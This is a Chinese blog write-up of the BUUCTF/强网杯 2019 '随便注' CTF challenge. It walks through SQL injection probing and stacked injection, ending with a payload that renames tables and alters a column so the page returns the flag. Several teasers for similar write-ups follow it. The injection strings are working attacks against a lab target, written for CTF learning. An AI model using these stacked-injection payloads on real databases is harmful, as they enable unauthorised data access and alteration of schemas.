[强网杯 2019]随便注1

最新推荐文章于 2023-10-26 10:12:27 发布

kindyyy

最新推荐文章于 2023-10-26 10:12:27 发布

阅读量262

点赞数

文章标签：数据库 sql mysql

本文链接：https://blog.csdn.net/kindyyy/article/details/126711767

版权

SQL注入堆叠注入数据库安全漏洞利用 MySQL

关键词由CSDN通过智能技术生成

先输入万能密码确定一下是否有Sql注入漏洞

1' order by 3#

当查询三列时，报错

只有2个字段。按照注入思路一步一步下去：

1' union select 1#

发现主要的查询语句被过滤：

在这里我学到了一个新的注入方法，堆叠注入，顾名思义，就是将语句堆叠在一起进行查询
原理很简单，mysql_multi_query() 支持多条Sql语句同时执行，就是个;分隔，成堆的执行sql语句

堆叠注入学习出处

';show databases;#

查询表

';show tables;#

其实直觉就觉得大概在1919810931114514里面有，让我们打开看一下

';show columns from `1919810931114514 `; #

新知识：堆叠注入遇到有数字时要用那个反引号包裹起来。

存在flag，但是没有办法访问。这里借鉴一下大佬的博客(4条消息) SQL Injection8(堆叠注入)——强网杯2019随便注_恋物语战场原的博客-CSDN博客_强网杯2019随便注

这里的意思大概是：这个默认查询word表的内容，没有办法看flag所在的表的字段，所以要将word所在的表名改为word，将word改为其他的表，即可默认查询flag。所以得到payload

';rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc  words;#

在用万能密码绕过即可得到flag：

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

kindyyy

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

【BUUCTF】web之强网杯2019随便注

12-14

开始注入： 1’ : 报错 1’ #：回显正常 1’ order by 1 #: 正常（经测试列数为2–此处小白暗自窃喜） 1’ union select 1,2#: 回显如图看来此方法是行不通了，但经过苦苦寻求，了解到了堆叠注入：库：1’;show databases;# 得到数据库 表：1’;show tables;# 得到俩个表列：1’;show columns from ‘表名’;# 这里注意表名为数字的要加反引号 “ 注：在网上百度发现得到一个带有flag的字段和另一个可查询的表 flag表：可查询表：到这里虽然发现flag 但是select已经被ban了所

[强网杯 2019]随便注 1

tomatoff的博客

03-14

2849

1、登录页面： 2、直接提交1： 3、提交1’: 4、提交1": 5、由输入为1’时报错，所以猜测结果语句应该为单引号闭合；所以提交a’ or ‘1’=‘1，获得： 6、后面不太会了，参考了大佬的文章： [强网杯2019]随便注(初学者看过来） 7、先学习下再补充自己的理解 ...

参与评论您还未登录，请先登录后发表或查看评论

【BUUCTF】[强网杯 2019]随便注 1

qq_45972928的博客

05-06

4091

这是一个典型的sql注入题目知识点： 1、注入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握（order by; union select; rename table; alter table…等等） 1、进入网站 2、看到一个输入框一个提交框，尝试进行数据输入了解大致情况经过尝试我们发现，只有输入1，2时有显示，输入0或者其他时没有显示 3、测试是否存在注入 and 1=1和and 1=2没有变化在参数后面加单引号，发现错误，可以尝试进行注入 4、尝试0‘ or

buuctf[强网杯 2019]随便注 1(超详细，三种解法）

m0_73734159的博客

10-26

2716

网页环境判断是否是字符型注入1'判断是否存在关键字过滤select联合查询被过滤，只能用堆叠注入了查看有几个字段正常回显回显报错，可以看出只有两个字段查看所有数据库查看所有数据表爆words数据表的字段爆1919810931114514数据表字段（注意数据表为数字的时候需要用反引号括起来）;可以看到这两个表words表有两个字段，而另一个只有一个字段。

[强网杯 2019]随便注

m0_56691564的博客

11-30

2793

该题作者在页面就查了这两个字段的内容，由于该题禁用select，因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。用rename把words表改名为其他的表名，把 1919810931114514表的名字改为words，给words表添加新的列名id，将flag改名为data。大意应该是过滤了select，绕过一下，好的发现绕过不了，不管是编码还是注释都不行，因此这个题使用堆叠注入。由show的作用可知，words表内就两个字段，一个叫id，一个叫data。

[强网杯 2019]随便注.docx

热门推荐

qq_44657899的博客

11-27

2万+

00X01 [强网杯 2019]随便注 1’ or 1=1 #

BUUCTF -web- [强网杯 2019]随便注

qq_44640313的博客

12-14

2682

以buuctf的强网杯2019为例的堆叠注入

buuctf [强网杯 2019]随便注 1

weixin_45642610的博客

01-07

1万+

buuctf web [强网杯 2019]随便注 1 -刷题个人日记小白一个，写给自己看。打开后是这样。从题目和内容来看就是一道sql注入题。输入 1' or 1=1;# 这个#用来注释掉后面的sql语句显示所有数据，这个数据有什么用我也不知道，但sql注入一般第一步就是这样看看有没有有用的信息（没有）。输入 1' order by 2;# 1' order by 3;# 到第3列报错，说明只显示两列。输入1'; show tables;# 可以看到有 191981093

[强网杯 2019]随便注1 解题思路(详细版)

qq_61861243的博客

09-24

405

1、首先通过题目，及页面提示，考虑到题目应该利用sql注入进行解决，首先试一下万能密码，查看一下回显内容2、既然这样我们就查询一下数据库中的所有表格1';#,这里我们可以得到两个表格words、19198109311145144、查看一下两个表格的信息, 1';#查询words表找到了两个属性一个id 一个data;1';#查询1919810931114514表我们发现有关flag的提示词。3、根据上一步题目查询我们可以推测出页面在所有访问过程中的回显，都是回显的words的内容。

BUUCTF-WEB：[强网杯 2019]随便注 1

_Co1a

01-24

992

题目环境：http://de044ac0-9162-4b83-b6a6-8c99ce0efe91.node3.buuoj.cn 打开环境：尝试注入：解题思路： 1、先尝试用union联合注入：第一步、测试注入点（一些小tips：利用引号，and 1=1， or 1=1之类的）判断是字符型还是数字型 1' [error] 1'# [不报错，正常回显] 1' and 1=1# ...

BUUCTF Web [强网杯 2019]随便注

wangyuxiang946的博客

10-25

1万+

「作者主页」：士别三日wyx 此文章已录入专栏《网络攻防》，持续更新热门靶场的通关教程「未知攻，焉知收」，在一个个孤独的夜晚，你完成了几百个攻防实验，回过头来才发现，已经击败了百分之九十九的同期选手。 [强网杯 2019]随便注一、题目简介二、思路分析1）判断注入点2）选择注入方式3）查看表中内容三、解题步骤1）获取表2）获取字段3）获取表中数据四、总结一、题目简介进入题目链接后，是一个「查询」功能，在输入框中提交id，即可返回「响应」的内容。在输入框中输入一个2，即可.

BUUCTF [强网杯 2019]随便注 1（两种方法）

m0_62879498的博客

03-05

1万+

buuctf-强网杯2019随便注

09-03

buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。注入漏洞是一种网络安全漏洞，攻击者可以通过在用户输入的数据中注入恶意代码来获取...